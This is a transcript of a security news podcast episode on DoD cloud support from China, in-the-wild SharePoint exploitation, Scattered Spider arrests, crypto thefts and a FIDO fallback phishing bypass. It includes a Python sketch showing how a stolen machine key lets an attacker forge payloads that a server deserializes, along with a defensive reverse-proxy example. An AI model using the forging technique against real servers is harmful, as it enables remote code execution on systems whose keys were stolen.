Risky Business #799 -- Everyone's Sharepoint gets shelled
Episode Date: July 23, 2025

Risky Biz returns after two weeks off, and there sure is cybersecurity news to catch up on. Patrick Gray and Adam Boileau discuss:
Microsoft tried to make outsourcing the Pentagon's cloud maintenance to China okay (it was not)
She shells Sharepoint by the sea-shore (by 'she' we mean 'China')
Four (alleged) Scattered Spider members arrested (and bailed) in the UK
Hackers spend $2700 to buy creds for a Brazilian payment system, steal $100M
Fortinet has SQLI in the auth header, Citrix mem leak is weaponised, HP hardcodes creds and Sonicwalls get user-mode rootkits. Just security vendor things!

This week's episode is sponsored by Airlock Digital. CEO David Cottingham talks through what it takes to build a mature, resilient management platform for a security critical system.

This episode is also available on Youtube.

Show notes
Update on DOD's cloud services
Microsoft to stop using engineers in China for tech support of US military, Hegseth orders review
A Little-Known Microsoft Program Could Expose the Defense Department to Chinese Hackers
While DOD policy bans unauthorized apps like TikTok from being on employees phones over national security risks
Microsoft Fix Targets Attacks on SharePoint Zero-Day – Krebs on Security
National Guard was hacked by China's 'Salt Typhoon' group, DHS says
Suspected contractor for China's Hafnium group arrested in Italy | Cybersecurity Dive
Singapore accuses Chinese state-backed hackers of attacking critical infrastructure networks | The Record from Recorded Future News
UK Arrests Four in 'Scattered Spider' Ransom Group – Krebs on Security
Four people bailed after arrests over cyber attacks on M&S, Co-op and Harrods
Brazilian police arrest IT worker over $100 million cyber theft | The Record from Recorded Future News
At Least 750 US Hospitals Faced Disruptions During Last Year's CrowdStrike Outage, Study Finds | WIRED
Hacker returns cryptocurrency stolen from GMX exchange after $5 million bounty payment | The Record
Indian crypto exchange CoinDCX says $44 million stolen from reserves | The Record
Chainalysis: $2.17 billion in crypto stolen in first half of 2025, driven by North Korean hacks | The Record
PoisonSeed bypassing FIDO keys to 'fetch' user accounts
Risky Bulletin: Browser extensions hijacked for web scraping botnet
A Startup is Selling Data Hacked from Peoples' Computers to Debt Collectors
A surveillance vendor was caught exploiting a new SS7 attack to track people's phone locations | TechCrunch
Ukrainian hackers wipe databases at Russia's Gazprom in major cyberattack, intelligence source says
File transfer company CrushFTP warns of zero-day exploit seen in the wild | The Record
HPE warns of hardcoded passwords in Aruba access points
Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257)
Researchers, CISA confirm active exploitation of critical Citrix Netscaler flaw | Cybersecurity Dive
Google finds custom backdoor being installed on SonicWall network devices - Ars Technica
Hackers Can Remotely Trigger the Brakes on American Trains and the Problem Has Been Ignored for Years
Transcript
Hey everyone and welcome back to Risky Business, my name's Patrick Gray.
Yeah, I'm back on deck after having a lovely holiday in Fiji.
Part of me is still back there in my mind a little, but it is good to be back
on deck.
Adam and I are going to go through the week's news in just a moment and then we're going to hear from this week's
sponsor, and this week's episode is brought to you by Airlock Digital, a
company that I really love. They're an Australian company that does allowlisting
software, and it works on Windows obviously, also Linux and Mac, and you
know, you can use it for allowlisting at scale. They've
got customers with like a hundred thousand plus endpoints under
management, but you can also do like host hardening with it and prevent people
from being able to easily move laterally in your environment using LOLbins. It's
really good software. So, Airlock Digital, this week's sponsor, and we're talking to
Dave Cottingham, Airlock's CEO, this week about what it's like building a grown-up enterprise platform for allowlisting, where all of a sudden you need to have like a multi-role console and whatnot.
It's a conversation that's much more interesting than it sounds, now that I've just said what it's about, but you'll see what I mean.
That's coming up later. But first up, of course, it is time to get into the week's news with Adam Boileau.
Mr. Adam, thank you for joining me.
Yeah, it's good to have you back on the internet.
I guess it's melted a little bit while you were away, so that's good.
Yeah, I tried to not pay attention, but I couldn't actually escape this story because
I had friends texting me about it while I was over there.
So this is a bit of a twisted road, this one.
It starts off with a piece from ProPublica, which was
published about a week ago. And the piece basically said that Microsoft has a
whole bunch of engineers in China who do support work for Microsoft's cloud
customers, which includes the Pentagon. So I mean, look, getting the Chinese MSS to
do your cloud support seems like a weird choice for the Pentagon, but this is the way that they've done it.
But don't worry, they have a compensating control, Adam, for this, which is they have
these digital escorts, these digital sherpas, who will escort these Chinese
workers into the Pentagon's cloud, where there is classified information, to make sure they
don't do anything wrong. And you know, that's fine, right?
That's fine. Until you read in this article that the pay rates for these
digital Sherpas, whose only requirement, like tech skills are a nice to have,
the only requirement is that they actually hold a clearance and they're paying
them 18 bucks an hour.
Yeah, that one really hurts.
The idea that you can secure a malicious person's admin access to your environment by paying
someone to watch them is already kind of shonky enough without it being someone who doesn't
understand the specific technology. And for that kind of pay rate, you're not getting
people who could do the actual work
for 18 bucks an hour.
Otherwise they would be paying them to do it.
And the idea that you can make this okay,
I mean, clearly you can't, right?
And that's the sort of the revelation from the story,
but it kind of, it looks like this has been going on
for really quite some time,
and that this was part of how Microsoft made the costing work to go sell the cloud to the DOD, which,
you know,
I mean, two thumbs up, two thumbs up, buddy. What a great idea. Right. So,
yeah, this, this actually picked up real quick.
And one of the reasons it picked up is you had, you know,
well-known right-wing loon Laura Loomer pick it up,
and she had access to some guy who was like a whistleblower,
who talked about how, yeah, getting support from Microsoft and it's like the person on the other end of the line is Chinese.
So this is, you know, really picked up across, like this is why it's a bit of a twisty one, right?
Is because you've got ProPublica running with this and then it gets picked up also
by the very right wing sort of mega fringe and everybody agrees.
Like just a rare moment of bipartisanship, right?
A very rare moment of bipartisanship where absolutely everyone agrees
this is a bad idea.
And even Microsoft's already said, oh, we're not going to do that anymore.
But this has culminated in
Pete Hegseth, the US Defense Secretary, announcing that, yes, no more Chinese contractors supporting
DoD cloud, please. Here is an excerpt from him announcing that. It turns out that some tech
companies have been using cheap Chinese labor to assist with DOD cloud services.
This is obviously unacceptable,
especially in today's digital threat environment.
Now this was a legacy system created over a decade ago
during the Obama administration,
but we have to ensure the digital systems
that we use here at the Defense Department
are ironclad and impenetrable.
And that's why today I'm announcing
that China will no longer have any involvement whatsoever
in our cloud services effective immediately.
So there we go, Pete Hegseth and his wonderful hair
announcing yes, no more, no more.
The MSS will no longer be supporting
the DOD's cloud infrastructure.
I mean- It's just bonkers, you know?
It's bonkers.
And you've got to wonder how many other places have done the same thing because the market
competes on price.
And if Microsoft had to do this to be cheap, presumably everybody else also has to scrape
the bottom of that barrel as well to be able to match the rates there.
So I wonder how many other people are going and quietly
changing their equivalent program
to do the same sort of thing for various bits of,
the defense industrial base.
Yeah, I mean, look, full credit to Hegseth though,
full credit to the DOD for recognizing
that this is a problem and trying to turn it around.
Although I do feel like Hegseth's two week timeline
to understand exactly how big a problem this is is
somewhat ambitious, let us say.
Yeah, I mean this is a program that has been there for a long time and you know getting rid of it overnight is not going to be straightforward, right?
They have to figure out who's going to do this, who's going to pay for it, you know, all those kinds of things.
And you know, this is not a unique to Microsoft sort of thing.
I mean, we've seen, you know,
I know I've been on the other end
of this kind of arrangement as well in my professional career
where I was allocated the Sherpa, you know,
to vet the commands that I was going to type into a Unix box
and then type them in for me.
So yeah, the whole idea is just not workable.
I want you to go into a little bit more detail about what that experience was like because
you have told me that over the last few days and you did not feel that the person who was
supposed to be your guide in this sensitive environment really had much of an idea of
what you were actually doing.
No, no, not at all.
I think in this particular case I was doing like Unix host reviews on some Unix boxes in some sensitive places,
and I was given, you know,
in order to get privileged access to it,
somebody else had to be my terminal,
and I had to tell them what to type.
And then I wasn't even allowed to see the output
of the commands.
The output of the commands got saved to a file,
and then the person who was my Sherpa
collected that output, gave it to their manager,
who gave it to their manager, who gave it to the project manager at the company that was
providing the Sherpa, who then gave it to my project manager at the customer, who then gave
it to our project manager at Insomnia at the time, and then they gave it to me,
after it had been through 47 hands. And this process of course took weeks.
Well, I mean, you know, with a process like that,
you could really start to see the efficiency benefits
of using people in low cost places, right?
What an efficient process, amazing.
And the thing that I found best
about that whole experience though,
was I still shelled the damn thing.
It just, it was not a fast process or a fun process,
but we still got there in the end.
Still managed to privesc, still managed to get my job done.
So yeah, very, very effective.
Good work.
Yeah.
Amazing.
Amazing.
Now look, the other thing that's going on at the moment, some bread and butter info sec that I'm guessing a lot of the audience are dealing with at the moment is
this, yeah, in the wild exploitation of a recent bug in SharePoint server.
I mean, that ain't great.
No, I mean, if you leave the SharePoint lying around on the internet, a lot of people do
still.
And this is on-prem SharePoint, not the cloud SharePoint.
Then, yeah, you're going to have a bad time.
And in this particular case, Microsoft has patched it over the weekend, but this was
being used in the wild pre-patch.
Yeah, it was being used as 0day, right?
Yes, it is not great. And this is like a combination of sort of an auth bypass plus deserialization
based code exec, which, you know, not what you want in your SharePoint, but also we've
seen attackers using it to steal machine keys, which, in .NET applications, if you know the machine key,
you can deserialize and run code kind of by design.
And the machine key is meant to be secret for that purpose.
So they're using this to gain machine key access.
And then even after it's patched,
they can come back in the future and code exec.
And given that like everybody from China
seems to be hacking all of the
SharePoints over the weekend, it's gonna be a rough time. Even if you did
patch it, if you didn't patch it quite fast enough, may not matter three
months down the track when they decide to come back and hit you again.
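To make the machine key point concrete, here's a rough Python sketch of the trust model involved. It's a simplified illustration, not ASP.NET's actual serializer or key derivation: ViewState is a serialized blob plus an HMAC computed with the server's validation key, so whoever holds that key can mint blobs the server will happily deserialize, which is why attackers grab the key and come back later (in practice feeding it to something like ysoserial.net to build the real payload).

```python
import hmac, hashlib, base64, pickle

# Simplified illustration of why a leaked "machine key" is game over.
# ASP.NET ViewState is a serialized object graph plus an HMAC made with the
# server's validationKey; the real format and KDF differ, but the trust model
# is the same: possession of the key == ability to forge accepted payloads.

VALIDATION_KEY = bytes.fromhex("aabbccdd" * 8)  # hypothetical stolen key

def sign(payload: bytes, key: bytes) -> bytes:
    mac = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload + mac)

def verify_and_load(blob: bytes, key: bytes):
    raw = base64.b64decode(blob)
    payload, mac = raw[:-32], raw[-32:]
    if not hmac.compare_digest(mac, hmac.new(key, payload, hashlib.sha256).digest()):
        raise ValueError("bad MAC")
    # Deserializing attacker-controlled data is the dangerous step; once the
    # key leaks, the MAC check no longer prevents it (pickle stands in for
    # .NET's ObjectStateFormatter here).
    return pickle.loads(payload)

# An attacker holding the stolen key forges a blob the server will accept:
forged = sign(pickle.dumps({"demo": "attacker-controlled object graph"}), VALIDATION_KEY)
print(verify_and_load(forged, VALIDATION_KEY))
```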
Yeah, I mean you and I were talking before we got recording about this one
and my comment was I do not understand why people who create these sort of
web applications expose so much attack surface pre-auth. It just seems crazy to me that before
you've authenticated to some sort of web service, that you can hit anything that isn't the login,
you know, the username and password fields.
And that should be pretty easy to not have exploits in.
You know what I mean?
Like it's just nuts.
Yeah, it is.
It is.
And in the .NET case in particular, the fact that their authentication scheme relies on
deserializing an object, right?
The cookie that you get to auth with is an object
that gets deserialized.
So by design, the unauthed attack surface
includes deserialization,
and they rely entirely on that machine key,
as that's the only thing that stops you
from turning that into arbitrary code exec.
So having an attack surface is one thing,
but then kind of specifically designing high-risk stuff
into your pre-auth attack surface...
Yeah, for the sake of what, right? One wonders.
It's just yeah, it boggles the mind. There's just you know so much complexity in modern auth that you kind of can't really trust it
well
Yeah, I mean, there is that, but there's also the fact that you've got a lot of these sorts of services and appliances where they
just leave stuff lying around
everywhere, publicly accessible. Like, think of stuff like PHP file include vulnerabilities, right? Or anything made by Oracle.
Yeah, exactly.
40,000 JSP scripts that you can hit unauthed and they're all terrible. Yes.
Yeah, and for too long, and it's something I've said before, for too long
we've sort of considered that authentication is access control, and it's just not. And this is why, so I mean,
What can you do about this if you want to run stuff like SharePoint, if you want to run
like file transfer appliances, payroll systems, this, that, whatever it is out on the edge of the
network for your staff to be able to access and for partners to be able to access, you know you
might consider using some sort of reverse proxy right? So I think Okta has one so if you're an
Okta customer you can do that it's probably going to cost you a bit. Uh,
Authentik, which is an open source IDP that I work with. Um,
they've got a reverse proxy as well.
There's a company called Pomerium that just does reverse proxies.
There's the company that I'm on the board of, which is Knocknoc,
which also has a reverse proxy.
So there's a lot of ways to simply set up reverse proxies
onto systems like this
that basically do not give you anything
until you're authenticated, right?
Like you just can't hit the machine.
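As a rough sketch of that "nothing until you're authenticated" pattern, here's a minimal example using only the Python standard library, with a hypothetical upstream address and a static token standing in for a real IdP-backed session (TLS and non-GET methods left out for brevity). The point is simply that unauthenticated requests never reach the backend app at all, so its pre-auth attack surface isn't exposed to the internet.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen

UPSTREAM = "http://10.0.0.5:8080"   # hypothetical internal app (SharePoint, appliance, etc.)
SESSIONS = {"d3adb33f"}             # stand-in for a real IdP-backed session store

class AuthGate(BaseHTTPRequestHandler):
    def _authed(self) -> bool:
        cookie = self.headers.get("Cookie", "")
        return any(f"session={s}" in cookie for s in SESSIONS)

    def do_GET(self):
        if not self._authed():
            # Unauthenticated users never touch the backend at all; a real
            # deployment would bounce them to the IdP's login flow here.
            self.send_response(302)
            self.send_header("Location", "/login")
            self.end_headers()
            return
        # Only authenticated traffic is forwarded upstream (GET-only sketch).
        with urlopen(UPSTREAM + self.path) as upstream:
            body = upstream.read()
            self.send_response(upstream.status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8443), AuthGate).serve_forever()
```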
So, you know, I would think that is something
people should look at.
Go get runZero, have a look at what's on your perimeter
and then start cutting this off.
Cut it off, cut it.
Everything you can get rid of, you know,
every little bit of attack surface that you
can at least put something in front of
just makes attackers miserable. And I'm like, make them miserable. Yeah, it does, it does.
You know, I just think that's a sensible thing to do at this point
I think, like, leaving this sort of stuff out at the edge with nothing in front of it is just not, it's not gonna
be a good time. I mean, we can't trust the vendors to write safe software to do their own auth. You've got to layer something in front of it.
Yep, that's it.
That is it.
All right.
So now look, what have the Chinese been up to apart from helping the DoD manage its cloud
environment?
Well, exploiting SharePoint bugs is one thing.
They've also been hacking the National Guard as well, apparently, according to NBC News.
Yeah, Kevin Collier wrote this piece about how the Chinese group Salt Typhoon apparently
broke into one US state's National Guard.
We don't know which particular state.
So far that particular detail hasn't come out, but there was a memo, I think, from the
Department of Homeland Security which described the fact that there had been this intrusion.
And obviously, yeah, National Guard's not a place you particularly want there to be Chinese attackers.
Yeah, I mean Salt Typhoon is something I normally associate with telco hacks,
so I'm not sure quite why they're doing this.
Well, I mean, I guess, you know, why not?
If you're hacking stuff to gain access, prepare the battle space, etc., etc.,
then yeah, I mean military stuff, telco stuff, it's all high value. But I mean, Volt Typhoon is the one that's doing
that sort of more preparation of the battlefield, right?
Salt Typhoon has just been telcos and like wiretaps
and stuff like that, right?
So, just kind of a big deal.
Who knows?
Yeah.
Maybe it's contractors, you know,
just filling their boots.
Well, speaking of contractors that do, like,
hacking for the Chinese government,
the Italian
authorities, working with the FBI, have arrested a Chinese guy
in Italy over the Hafnium Exchange hacks, and everybody would remember that,
back then, oh my god, it was like five years ago now, but remember when every
single Exchange box was just getting shelled by everyone completely? This was,
yeah, there was a China nexus to that.
And it looks like this guy, Xu Zewei, 33 years old,
he's been charged over this stuff and it looks like he works for a
contractor called Shanghai Powerock Network Company, which, awesome name, dude.
But they apparently contracted to the MSS and
yeah, so now he's in trouble and he's going to get extradited.
Now does this set a precedent that China can start arresting NSA people?
I don't think so, personally, because this sort of like massively destructive attack,
you know, it's just very messy, creates a lot of collateral damage.
It's very different to the sort of operations that Five Eyes countries tend to do where
you'd rarely hear of them because they tend to be quite careful, they tend to limit scope,
they tend to clean up after themselves, whereas these guys, they're just the proverbial bulls
in a china shop.
Yeah, they certainly did make quite a lot of mess.
And I think, you know, also, if you work at NSA or some Five Eyes agency,
the chances that you're going to go to Hong Kong on holiday are
probably not super high. Like, I think that's probably drilled into you pretty hard.
You might go somewhere that might have some sort of agreement with China or whatever.
But look, there's a couple of reasons why it won't happen. First of all, the opsec in the Five Eyes agencies is actually pretty good.
Yeah, so I think that's a real thing that would prevent this. But yeah, so I wouldn't just say that, like, you know,
it's about NSA operators not having holidays in Hong Kong.
Like I just I don't think it's the same thing.
Yeah, I guess I don't know what the state of, you know, China's
relationship with other countries for extradition agreements are.
And I guess that's the problem, right?
If, you know, if they do have relationships with either Brazil or whoever,
then maybe that makes going
somewhere a little more complicated.
The thing I guess that struck me about this story is when we have seen indictments of
Chinese operators by US law enforcement, there's been quite a lot of people saying, look, what's
the point of this?
Why do we bother doing this?
They're never going to face justice.
One time in 100, one of them gets on a plane
and goes to Milan.
So you don't know if there is something happening to them.
It's also a mechanism for the US government in this case
to actually put pen to paper and publicly do an accusation.
Do you know what I mean?
Like it's a public attribution, it's an official document.
Like I don't think it's pointless.
I think just the act of actually doing these sort of indictments,
even if the person is never going to be apprehended,
I think there is value in that.
Yeah, yeah.
But there has been a lot of criticism, I guess, of that work
and whether it's kind of a waste of effort.
But hey, you know, I'm going to be interested to see what happens
when this guy gets back to the US.
Like, what's that going to look like?
Well, it's going to look like a bunch of charges.
And probably the Chinese government saying, these are all lies.
These are all lies. This guy has nothing to do with us.
So I can't imagine they're going to go to bat for this guy.
Like, probably not.
Apparently Chinese state-backed hackers, an uncategorized group,
UNC3886, have apparently
been owning some critical infrastructure in Singapore, according to a senior official there.
Yeah, that makes a lot of sense. Singapore is definitely the sort of place you'd expect
there to be Chinese attackers. I think this particular group is one of the ones we've seen,
you know, exploiting Fortinet bugs, exploiting VMware bugs, like feels like one of the, you know,
kind of private contractors sorts of companies.
So yeah, not surprising to see them there.
No, now we've got some good news here, which is four Brits, young, between 17 and 20,
have been arrested over sort of scattered spider ransomware stuff, including the attacks
on Marks and Spencer and Harrods. Some of these people were also involved in like the
MGM casino hacks back in 2023. And yeah, they're just going to have a very, very bad time,
I suspect. Although, you know, if you had to choose as a computer criminal, whether
or not you would want to be arrested in the UK or whether you would want to be arrested in the United States, like it ain't
even close. I would like to go to the UK court, please. I'm unsure whether or not there's
going to be any sort of extradition here if anyone's seeking it or whatever over the MGM
stuff. But yeah, at the very least they've been bailed. All four have been bailed. But
yeah, they're in big trouble. Yeah, yeah, they certainly are. And Brian Krebs, so when they were arrested and then
subsequently bailed, we didn't see any public reporting of their names. Krebs did some footwork
and figured out that one of them, it's a guy called Owen David Flowers, who was the one
that was involved in the MGM hack. And he's pulled some threads about some of the nicknames
the guy was using on the internet. Another one was the guy who was behind Doxbin, also a member of Lapsus$,
been kicking around that scene for a number of years now. And Krebs has a good, you know,
kind of write-up of that particular guy's history. Thalha Jubair is his name. So yeah,
that looks like kind of bad news sort of guy. He got doxed
by one of the other members of Lapsus, you know, back in that particular set of scene wars. So yeah,
been kicking around for quite some time. With friends like those, as they say. It's interesting
too, because Tom wrote this up, I think it was like around the time I left for my break,
that threat intel companies have been putting out research saying that the idea that Scattered Spider
is a vibe, as we like to say on the show, is not actually right.
And there's something, there's a very small group of people who direct most of the really
malicious bad activity, something like four people.
I think two different companies had settled on that four people figure.
I'm not sure if these, if any of these are part of that four,
but the idea seems to be at the moment, the thinking seems to be out there,
that it will be possible for law enforcement to make a dent on the activity
that we've been attributing to this scene.
And that it's maybe not the entire scene that's doing most of the damage,
it's just a few
sort of skilled and highly motivated people. So that is interesting.
Yeah, yeah, I mean, you know, I'm sure when we see the inside details of all of this, like, we'll
have a better idea of how it worked.
But that tends to be how it is with these underground communities: there tends to be a few big personalities
that drive everything else and kind of drag everyone else along with them,
and then you know people want to level up and get better and prove that they have skills too.
And that kind of drives a bunch of the competing sort of activity they undertake.
But yeah, there tends to be some big names that once you drop the hammer on them,
it's pretty bad for the scene overall. Yeah. Now John Greig has a write-up about an arrest in Brazil over the theft of a
hundred million dollars through Brazil's instant payment system, which is called
Pix, right. So this guy worked for C&M Software, and I'm not exactly sure:
does C&M actually maintain Pix, or did they just use their access in C&M to get to the Pix system?
I think what I had read is that they are a provider that
does, like, Pix software access for smaller banks that don't have their own infrastructure to do it.
So they are one of the people that provides access to Pix, mostly for smaller banks. Okay, point is,
this breach was enabled via access into a company called C&M Software.
And the police have arrested this guy.
He's 48 years old.
He sold his account name and password to some hackers for $2,700 US dollars in two separate
cash payments after they approached him in a bar.
And that's led to a $100 million theft.
Yeah, that's a hell of a return on investment for the attackers. But yeah, that, like this insider
kind of threat aspect to it, like really should make people's spidey senses twinge, right, because
we spend so much time on cyber controls and computer stuff.
But in the end, if one of your employees is willing to sell their access, you know, for
not a whole bunch of money, then a lot of that kind of edge perimeter stuff really stops
mattering when it's a case of spending that kind of money. And I think this guy was,
I think I read that he was an electrician or something, like some other technical
trade who had retrained into IT later in his career because he wanted to, you know, better
himself. And, you know, it's kind of sad in the way that probably he didn't really
understand the impact of what selling his credentials
would mean. We don't know what they told him they wanted to do
with that access as well, right. But yeah, just generally speaking, if someone approaches you at a bar and offers to buy your username and password for your work
accounts, um, yeah, it's not going to go well. It's really not going to go well. So yeah, I mean,
what do you, what do you even say about this? I mean, what, what, what can you do as you said,
like, okay, great. Okay. Give everyone YubiKeys. Well, then they'll just sell their YubiKeys.
Yeah. Yeah. You know, if you restrict access into those physical buildings,
like, at what point do they start taking bribes to smuggle people into the buildings to access a terminal? And like,
you know, when you've got a motivated insider like this...
Yeah, woof, pretty hard. Yeah, it's hard, right. And then what do you do?
Well, you pay good wages and you treat your employees well
and make sure no one's got any grievances
and like it's hard and expensive.
Yeah, but even then we've seen malicious insiders
at places where they were being looked after,
where they were being treated well, you know,
and it can be something as simple as like office politics
that trips someone into doing this, you know.
Now let's talk about CrowdStrike
and how it has completely lost its mind.
CrowdStrike is disappearing up its own clacker and it is just bizarre.
We've got a piece here from Andy Greenberg looking at some research out of UC San Diego,
trying to pin down exactly how disruptive their kernel panic was to the healthcare sector
in the United States.
Now I think that's a worthy, I think that's a worthy endeavor to try to figure this out.
I do.
Now can you pin it down exactly?
No, but it seems like the researchers here have made a good faith attempt to see, you
know, how many hospitals had had disruptions to their systems.
Crowdstrike's response to this has been kind of deranged.
They've called it junk science.
They've said, drawing conclusions about downtime
and patient impact without verifying the findings
with any of the hospitals mentioned
is completely irresponsible and scientifically indefensible.
And then they pivot from there into a, well,
we recognize we had an incident and we sincerely
apologize to customers.
So look, we're getting to a discussion on this in a moment.
But look, I just want to say a couple of weeks ago, we actually got an email from crowd,
I'm about to spill some tea, everybody.
I'm about to spill some tea, as the kids say.
We got this email from CrowdStrike's like APJ
director of public relations asking us to correct an error in a newsletter that
was written and published by us. It was Catalan's Risky Bulletin newsletter and
it said, oh can you correct the sentence, a bug in the CrowdStrike kernel driver
took down over 8.5 million Windows systems." And then this is the
CrowdStrike person speaking. The incident was from a defective rapid response
content update as noted on our website and in the RCA also attached.
Rapid response content updates are not code or a kernel driver. This sentence is
inaccurate as written. We request that you please replace blah blah blah blah
blah blah blah blah to accurate language.
Now I ignored this.
And then they emailed again.
Hi, Catalin, hope you're well.
As per my initial email yesterday,
could you please update blah, blah, blah, blah, blah, blah?
Now, if you've got a content update
that can trigger this condition,
you have a bug in your kernel driver.
Would you agree with that?
I would agree with you.
So I wrote back in the end, I said, hey,
a name redacted, I'm the publisher here at Risky Business Media.
It takes a pretty serious deficiency, a bug, you might call it,
for a kernel driver to crash when supplied with a content update.
We're happy with our phrasing here.
But the reason I wanted to talk about that email, right,
is because I think CrowdStrike has almost taken on like a bit of a cult-like mentality. I think CrowdStrike makes best in class, you know, EDR, right?
Like it is fantastic. I think the Microsoft stuff's good as well.
The Sentinel One stuff's good as well. But I think, you know,
CrowdStrike really has been the company that has, for
the largest proportion of users, defined that space.
They've grown a lot.
They keep buying and bolting on all sorts of monstrosities onto this to try to platformatise
their offering.
And by all reports, their additional products just aren't really that good.
I'm just going to say it.
They're not that great.
People will bite the bullet, buy it, use it because, okay, we're already a CrowdStrike customer.
We've already got that footprint out there, but no one really thinks it's best in class anything.
And yet the people who work there and the PR response just seems bizarre. It seems cult-like.
Do you sort of see what I'm saying? Yeah, yeah. It does seem like a strange
hill to die on, right?
Like you could make your product good and do good work and do all the engineering
and, you know, necessary stuff to not have these problems in the first place.
Or you can send your PR people out to, you know, have a go at a small Australian blogger.
Like in what universe, in what universe was that a good idea for them to do that?
Like in what universe is that a hill worth fighting on, worth climbing, let alone dying on?
Yeah, yeah, I know.
They could gargle my, CrowdStrike, you can gargle my coconuts.
Yes.
Anyway, back to this paper.
What do you think about this research?
I think it's a good idea to try to quantify what the disruptive impact to the US health care system is.
I've always said that this CrowdStrike outage
or CrowdStrike blue screen of death across millions of boxes
that happened last year was the best sort of simulation
we're gonna get of a large scale cyber attack
until we actually get a large scale cyber attack.
So I think this is a good idea.
Yeah, no, it is.
The researchers in question, they were already monitoring the uptime,
like the availability of hospital IT systems,
because they had a project to try and determine who was getting ransomwared.
And so they had this monitoring infrastructure in place.
And then when the CrowdStrike thing happened,
they were able to very quickly use their existing tooling to go collect the same data and say, here are a bunch of hospitals where systems that we can observe
from the outside that are clinically relevant, you know, things like, you know, portals for
doctors to log into and so on, are not available that were previously. And they tried to correlate
based on timing across the set of hospitals that they were looking at, which I think was
about a third of the US medical system
that they had some coverage over.
And then from that infer,
that bad stuff was happening because of CrowdStrike.
And they controlled for,
like there was an Azure outage about the same time,
and they tried to kind of account for that.
So from the point of view of the research methodology,
it seemed like a pretty reasonable,
at the very least it's interesting.
The data they have is interesting.
And it's clearly not perfect because they
weren't able to go talk to all those hospitals
and get inside the data.
And they're doing it from the outside.
But as a piece of research, it seems pretty representative
and relevant and useful.
Well, I don't think they're making any claims beyond what they've said the data says, right?
Like where, you know, so for CrowdStrike to then attack them like this just seems bizarre.
And I guess I've already got my backup because they're writing to us because they're saying
it wasn't a kernel bug.
I mean, really, does that make a difference, guys?
Like if it was a kernel bug or a content update, you still blue-screened 8.5 million machines.
Yeah, if the airport's blue screened, it does not matter if it was a content
update or a couple of other things. It's the ultimate "well, actually": actually,
it wasn't a kernel bug, it was a rapid content update. It's totally different. So yeah, anyway,
I just think they've kind of disappeared up their own behind lately.
And it ain't a good sign for the company.
You know what I mean? You know exactly what I'm talking about, right?
I do. All right.
We're not going to talk about these ones so much.
But John Grieg has a write up of two of these over at the record.
The Cryptocurrency Exchange, GMX had $42 million stolen from it and they've agreed
to let the attacker keep $5 million.
That's a bounty.
I mean, we keep seeing this over and over and over.
It's nuts, isn't it?
Yeah, it really is.
And it's just encouraging.
It's classic tragedy of the commons, right?
Where every exchange or person that does this encourages attacks on all of them.
It's just a bad idea.
And the thing is, they're not even really legally binding, right?
I mean, we've seen other people get prosecuted despite having this
white hat reward fiction, and yet they still end up getting arrested anyway.
So, you know, let's hope law enforcement
decides they don't care and are going to go after these people anyway.
I mean, I think the days of us joking, and it was funny at the time,
that cryptocurrency theft is a victimless crime.
You know, it's starting to get a bit serious.
Like there's so much money in this stuff now,
and normal people are starting to invest in it.
Like, you just sort of think-
"Invest" in very heavy air quotes,
because like, oh, for God's sake.
But they don't realize that.
They think it's a proper investment.
And I think there's all the sharks are going to come in.
I think there's some deregulation happening now in the United States in particular,
which is going to allow all of these sharks to go and like sell people like
crypto tulip bulbs into their 401Ks.
And it's just it's going to end in tears.
The question is just how long.
So there was another one, an Indian crypto exchange called CoinDCX.
They lost 44 million bucks as well. And John Greig has also written up some Chainalysis research
that says 2.17 billion in crypto has been stolen in the first half of 2025. But 1.5
billion of that was the Bybit hack, which I still think was like just so cool.
Yeah, we do have to hand it to the Norks for that one because, yeah, they did a good job there.
Yeah, but they're predicting like up to four billion in crypto theft this year, which is just wild, wild time.
Now, let's talk about this research out of Expel, which is how to bypass a login flow where someone's using like a YubiKey by using this, what is it?
Cross-device, what's it called again? Cross-device?
Authentication, yeah. So this story is kind of interesting.
It is, it is. I've read through it and I'm like, okay, I get it now, yeah.
So we, so, Catalin wrote the story up for us whilst you were away.
And I remember like, you know,
cause we edit the script pretty early in the morning,
we pasted it in our Slack and said,
hey, Metl, you're gonna wanna read this one
cause it's good read.
And I woke up and this was how I spent the first
like hour of my day reading this story.
The deal is they looked at something
that was being authed with, you know,
with a YubiKey, you know, a FIDO key.
And this particular instance of it had a mechanism
where you could fall back,
if you didn't have your YubiKey available,
you could fall back to another authentication mechanism.
So what we are talking about here is a way
to go around a YubiKey rather than a bug in FIDO
or U2F or YubiKeys themselves.
And then this involved basically scanning a QR code with your
authenticator app on a separate mobile device and using that to authenticate
your login as a second factor. So that was username and
password, and then you use the QR code to kind of phish the user in an attacker-in-
the-middle context. Now, in the way that you would do this
in the U2F ecosystem, like there's the official way
in U2F of doing cross device authentication.
And in that particular like standards way,
there is a Bluetooth callback mechanism
that binds the browser to the auth device
so that everyone agrees who you're authing to
so that you can't do this kind of relay phishing
or in the middle phishing.
In this particular case, that wasn't what they were
attacking, this site had another mechanism,
as best I can tell, had another mechanism
that used a QR code.
So it wasn't the, like, CTAP with Bluetooth binding,
which is like the way that you should be doing this.
But overall, like regardless of the specific mechanism here,
the way that you can trick users and the way that we fall back around these
robust authentication mechanisms really is the core problem here.
Because people are used to having to get their phone out and scan a QR code.
They're used to having to do things that are not just username and password now,
and yet no one really understands
how any of this actually works yet, and nor should they.
We're meant to be solving these problems for them.
So this is kind of illustrative
of the complexity of modern auth,
and the complexity of non-ideal auth situations
when you're on a strange device,
on a device that doesn't have a keyboard,
on a device that doesn't have a camera, on a device that, you know, doesn't
have the compute power or a USB port or whatever. So everything that we build
that makes auth robust, we still have to deal with the real world of imperfect, you
know, end-user computing. Yeah, that's right. And I think, you know, we've talked
a lot over the last, I don't know, like, half a decade about how one of the weaknesses when you're using robust auth is always going to
be stuff like when people need to reset a credential.
Yeah.
And we've seen a bunch of these social engineering attacks quite recently where that's what people
are doing. They're going to help desks, they're getting their MFA reset or whatever. There's
another incident here that is mentioned in the expel blog post where someone got,
they compromised an account through a phishing email and then they just reset the password
somehow and enrolled a Fido device, which was perfectly good enough for all of the devices
where they had to use that device. So, you know, this isn't a problem per se with like Fido or
U2F. Like the problem is where all of the junk auth reset flows and stuff around
those.
All the glue.
Yeah, it's all the glue.
